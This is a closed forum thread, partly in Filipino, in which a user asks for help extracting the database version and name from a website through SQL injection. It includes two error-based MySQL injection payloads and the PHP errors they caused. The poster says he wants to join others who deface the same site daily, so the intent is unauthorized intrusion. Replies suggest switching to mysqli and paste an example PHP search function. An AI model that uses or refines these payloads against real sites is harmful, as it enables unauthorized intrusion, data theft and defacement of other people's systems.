What's new

Closed Sql injection

Status
Not open for further replies.

Destroyers

Enthusiast
Joined
Aug 2, 2016
Posts
7
Reaction
0
Points
62
Please help me sir.
The site have only one column
when i put union all select or union select 1 it showed

lg.php

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 419

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 440

when I put
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

or
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

I'ts the same output
I cant get the version and database.
Please how to get the version,database?
please comment the command. ty
 
I think older version ang database na gamit niya kaya ganyan or maybe confused ka kung ilang column/s ba talaga ang meron siya.
 
depreciated na ginagamit mong mysql. gawin mong mysqli lhat ng query mo

Teach me sir. I don't know how to use mysqli in website
I don't know where I gonna put this
<?php
function doSearch() {
$output = '';
if(isset($_POST['search'])) {
$searchq = $_POST['search'];
$searchq = preg_replace ("#[^0-9a-z]#i","",$searchq);
$sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
$query = mysqli_query($connect, $sql);
$count = mysqli_num_rows($query);
if($count == 0) {
$output = '<tr><tr>No results found.</tr></td>';
} else {
while($row = mysqli_fetch_array($query)) {
$eName = $row['name'];
$eDesc = $row['description'];
$eCont = $row['content'];
$id = $row['id'];
$elvl = $row['level'];
$ehp = $row['hp'];

$output .= '<tr><td><a href="You do not have permission to view the full content of this post. Log in or register now.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
}
}
return $output;
}
}
that just example
 
Teach me sir. I don't know how to use mysqli in website
I don't know where I gonna put this
<?php
function doSearch() {
$output = '';
if(isset($_POST['search'])) {
$searchq = $_POST['search'];
$searchq = preg_replace ("#[^0-9a-z]#i","",$searchq);
$sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
$query = mysqli_query($connect, $sql);
$count = mysqli_num_rows($query);
if($count == 0) {
$output = '<tr><tr>No results found.</tr></td>';
} else {
while($row = mysqli_fetch_array($query)) {
$eName = $row['name'];
$eDesc = $row['description'];
$eCont = $row['content'];
$id = $row['id'];
$elvl = $row['level'];
$ehp = $row['hp'];

$output .= '<tr><td><a href="You do not have permission to view the full content of this post. Log in or register now.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
}
}
return $output;
}
}
that just example
yang code mo kasi n yan png filter lng yan
 
mahirap yan lalo na kung malalaking sites ang i häçk mo meron mga security features mga un

and daming nakakahäçk na nung website na hinahäçk ko.
natatwa lang ako kac nagaagawan. kada araw iba iba yung defaced page.
kaya sinubukan ko pero ayaw. dko kaya. papatulong sana ako eh! kac yung ibang site na na incounter ko parehas lang dun. kaya kung malalaman ko kung pano siguro parehas lang sa iba yung command.

kira111101 parang pamilyar pangalan mo COD3X kaba?
 
Status
Not open for further replies.

Similar threads

Back
Top